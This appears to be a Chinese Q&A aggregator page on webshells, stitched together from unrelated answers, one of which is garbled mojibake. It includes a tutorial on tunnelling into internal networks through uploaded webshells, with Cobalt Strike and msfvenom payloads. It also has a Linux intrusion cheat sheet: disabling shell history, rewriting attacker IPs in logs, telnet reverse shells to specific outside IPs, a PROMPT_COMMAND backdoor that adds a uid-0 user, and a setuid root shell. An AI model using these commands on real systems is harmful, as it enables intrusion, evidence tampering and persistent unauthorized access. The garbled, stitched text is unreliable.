導航:首頁 > 編程語言 > pythonwebshell

pythonwebshell

發布時間:2024-07-27 07:49:58

python 璋冨害sell

鏈夊緢澶氭柟寮忥紝棣栧厛瑕佽В鍐崇殑鏄浣犲備綍浠嶢鏈哄櫒璁塊棶鍒癇鏈哄櫒銆
鍙浠ラ氳繃ssh錛屽彲浠ョ敤paramiko妯″潡鏉ュ仛錛岀櫥闄嗐佹墽琛屽拰鍥炴樉閮芥湁渚嬪瓙錛屾瘮杈冩柟渚
鍙﹀栧彲浠ラ氳繃鑷宸卞啓socket server錛岄儴緗查兘B鏈哄櫒涓婃帴鏀舵寚浠わ紝A鏈哄櫒璐熻矗璋冨害
褰撶劧http鐨勬柟寮忎篃琛岋紝濡傛灉B鏈哄櫒涓婃湁web鏈嶅姟鍣錛岄偅涔堟墽琛寃ebshell涔熸槸寰堟柟渚跨殑錛屽叧閿鏄浣犺佸仛濂藉畨鍏ㄦ帾鏂斤紝渚嬪備笓闂ㄥ紑涓絝鍙g洃鍚璁塊棶webshell鐨勮鋒眰錛屽苟闄愬埗鏉ユ簮IP銆
鏂瑰紡鏈夊緢澶氾紝濡傛灉鏄鍋氬氭湇鍔″櫒綆$悊鐨勶紝浠庢晥鐜囦笂鏉ヨ詫紝socket鏈浼

Ⅱ 內網滲透之http隧道

最近在整理內網滲透的一些相關資料,隧道的搭建是後滲透階段重要的一環。隨著防守的手段不斷升級,某些情況下只能搭建http隧道。

簡介
通過HTTP協議與代理伺服器建立連接,把所有要傳送的數據全部封裝到HTTP協議里進行傳送,協議中包含有要連接的遠程主機的IP和埠,連接成功之後會返回給客戶端200,表示驗證通過。

獲取webshell的主機位於內網,並且該內網主機的icmp、dns、tcp和udp協議等都不能出網,唯一的數據通道是webshell搭建正向代理。
根據代理的穩定性、速度推薦Neo-reGeorg、reGeorg、abptts 三款工具。

可以稱為reGeorg的升級版,且傳輸內容經過了base64編碼,避免特徵檢查,有效繞過檢測。

https://github.com/L-codes/Neo-reGeorg

1.設置密碼,生成tunnel的webshell,並上傳到目標伺服器。

windows上可以使用SocksCap64 或者proxifier工具配置代理。
以windows上的SocksCap64 為例,添加代理。

測試連接成功。

注意有個測試代理地址。

點擊可測試。

linux上可以使用proxychains代理
編輯

添加代理IP以及埠即可。

kali本地工具就可以通過proxychains命令全部代理進內網。
注意代理不支持icmp協議。proxychains nmap -Pn -sT -sV -v -T4 IP

reGeorg 是 reDuh 的升級版。主要把內網伺服器的埠通過http或https隧道轉發到本機。

https://github.com/sensepost/reGeorg

1.上傳tunnel.nosocket.php到目標伺服器。

2.連接tunnel.nosocket.php,配置代理。

在SocksCap64 添加代理。

測試連接成功。

abptts是一款基於ssl加密的http隧道工具。全程通信數據加密有效對抗檢測。

https://github.com/nccgroup/ABPTTS

1.安裝python依賴庫

2.本地運行,生成webshell
注意:該工具不支持php

將生成的代理腳本選擇性上傳到目標伺服器。
返回hash值,說明代理正常執行。

建立隧道,將目標伺服器的3389和本地的3389進行綁定。

遠程連接本地的33389埠

另外:
冰蠍本身也有socks代理。
Tunna 也可以在內網代理中轉發埠。

pystinger是通過webshell來實現內網的SOCK4代理。
使用python開發,當前支持php,jsp(x),aspx三種代理腳本。可直接用於metasploit,cobalt strike上線。

https://github.com/FunnyWolf/pystinger

1.上傳proxy.jsp到目標伺服器,確保可以正常訪問。

2.上傳stinger_server.exe 到目標伺服器,並start命令運行該程序

vps 運行client端

將會在vps的6000埠啟用socks4a代理

在SocksCap64 添加代理,測試一下。

配置60020埠的listener。

選擇payload 生成artifact.exe,觸發後即可上線。

vps可看到socks連接。

msfvenom生成60020埠的payload.exe

metasploit 配置對應的監聽

將payload.exe在目標機上觸發後,即可上線。

https://micro8.github.io/Micro8-HTML/Content/91-100.html
https://klionsec.github.io/2016/09/15/abptts-http-tunnel/

Ⅲ linux 怎麼入侵

1,登錄ssh之後不記錄history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
2. sed的一些邪惡用法
邪惡的替換到登錄的IP和日誌里的訪問IP
sed -s 』s/211.xxx.xxx.xxx/192.168.1.1/g』 access_log access.log security
邪惡的添加ssh限制登錄的用戶
sed -i 』s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g』 sshd_config
不過這個添加之後要強制重啟sshd服務才可以生效
lsof -i:22 查找sshd的進程ID
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)
sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
然後
kill -SIGHUP 18662
3.通過webshell反彈shell回來之後獲取真正的ttyshell
python -c 『import pty; pty.spawn(「/bin/sh」)』
另外一種獲取ttyshell的方法
$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
bash sh.exp
4.通過TELNET進行反向連接:
telnet [attacker_ipaddr] [port1] /bin/bash telnet [attacker_ipaddr] [port2]
telnet 210.51.173.41 8080 /bin/bash telnet 210.51.173.41 8081
/usr/bin/telnet 203.93.28.236 8000/bin/bash/usr/bin/telnet 203.93.28.236 8001
在203.93.28.236上面運行:
nc –l –p 8000
nc –l –p 8001
/usr/bin/telnet 192.168.1.100 8088/bin/bash/usr/bin/telnet 192.168.1.100 8089
5.curl download
The full command should look something like this:
curl -C – -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg
6.Windows下面NC監聽linux返回shell執行命令不能正確換行的解決辦法
unalias ls
7.linux的BASH提權
export PROMPT_COMMAND=」/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND」
8.ssh tunnel
ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f
9.本地rootshell
bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具體操作比較簡單,大概說一下cp /bin/ksh . ; chown root.root ksh; chmod 4755 ksh,然後執行ksh就可以獲得root許可權了;這一招雖然看似低俗,但某些時候還是很有用的。所以一般情況下把多餘的shell刪除可以在一定程度上增加黑客的入侵成本,沒實施的同學可以考慮在標准化裡面加入這個操作

Ⅳ web攻防,php,Linux,Python,社工等,這些什麼意思

web攻防一般指網站漏洞攻擊,拿站,暴庫,滲透,跨站,webshell,提權,,,
php是網頁網站編程語言
linux是電腦操作系統,有別於windows,mac
python簡稱py語言,是一種解釋性編程語言,手機上涉及到不少,,,
社工全稱社會工程學,是黑客作案的一種手法,社工社工嗎,收集信息資料,騙取信任,,,,

Ⅳ 我想用python寫個web界面簡單執行遠程linux命令 web界面要能自由填寫執行shell命令和腳本

首先python基礎你得會:
最簡單套路:web用flask,linux交互用subprocessor模塊
說白了就三點:python基礎、flask框架、subprocessor模塊

閱讀全文

與pythonwebshell相關的資料

熱點內容
幼兒編程教育培訓多少錢 瀏覽:403
經常生氣有什麼東西能解壓 瀏覽:901
代理伺服器地址和埠可以怎麼填 瀏覽:63
unity5手游編譯模型 瀏覽:265
安卓無人機app源碼 瀏覽:808
pl1編程語言 瀏覽:801
台達plc編程換算指令大全 瀏覽:174
手機上的編程游戲 瀏覽:108
伺服器密碼機有什麼用 瀏覽:477
dos磁碟命令 瀏覽:955
單片機cpu52的功能 瀏覽:691
opc伺服器怎麼開發 瀏覽:373
覓喜是個什麼app 瀏覽:402
加密cd機 瀏覽:946
社保用什麼app繳納 瀏覽:313
nodevlinux 瀏覽:582
騰訊tt伺服器怎麼登錄密碼 瀏覽:898
windows命令提示符 瀏覽:352
win7管理員許可權命令 瀏覽:729
地圖app哪個適合老年人用 瀏覽:74